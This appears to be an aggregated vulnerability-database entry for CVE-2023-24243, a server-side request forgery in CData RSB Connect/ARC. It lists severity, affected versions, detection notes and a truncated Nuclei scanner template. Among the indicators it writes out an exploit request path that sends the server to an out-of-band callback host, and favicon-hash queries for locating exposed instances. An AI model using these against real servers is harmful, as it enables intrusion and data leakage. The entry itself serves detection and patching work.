CVE-2023-24243
Published 2023-06-16
CVE-2023-24243: CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
Priority: P3 · 53 · high · CVSS 3.1: 7.5
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit: EPSS 4.00% (89.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdata | arc | < 22.0.8473 | 22.0.8473 |
Detection & IOCs (extracted from sources)
- url: {{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb
- other: http.favicon.hash:163538942
- other: icon_hash="163538942"
- SSRF exploit path uses double URL-encoded backslashes (%255c%255c) to trigger a UNC-style path traversal to an attacker-controlled host; detect outbound SMB/DNS callbacks from the server following requests matching this pattern.
- Successful exploitation results in an HTTP 404 response from the target while a DNS interaction is observed on the attacker-controlled interactsh server; correlate 404 responses on this path with out-of-band DNS callbacks.
- Identify exposed CData ARC/RSB Connect instances using Shodan favicon hash 163538942 or FOFA icon_hash query as a pre-exploitation reconnaissance indicator.
- The Nuclei template requires an active interactsh (out-of-band) server to confirm exploitation; DNS callback detection is the primary confirmation mechanism, meaning purely passive/inline detection will not catch this SSRF without OOB infrastructure.
- The vulnerability affects specifically CData RSB Connect v22.0.8336; the CPE wildcard in the template (cpe:2.3:a:cdata:arc:*) means version-agnostic scanning may produce false positives on patched versions.
No detection rules found.
Nuclei
CVE-2023-24243 [HIGH] CData RSB Connect v22.0.8336 - Server Side Request Forgery (nuclei · CVSS 7.5)
CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
Template:

```yaml
id: CVE-2023-24243

info:
  name: CData RSB Connect v22.0.8336 - Server Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336.
  reference:
    - https://twitter.com/W01fh4cker/status/1669890019191037952
    - https://
```
No writeups or analysis indexed.
References
- https://arc.cdata.com/
- https://arc.cdata.com/trial/
- https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8
- https://www.cdata.com/kb/entries/netembeddedserver-notice.rst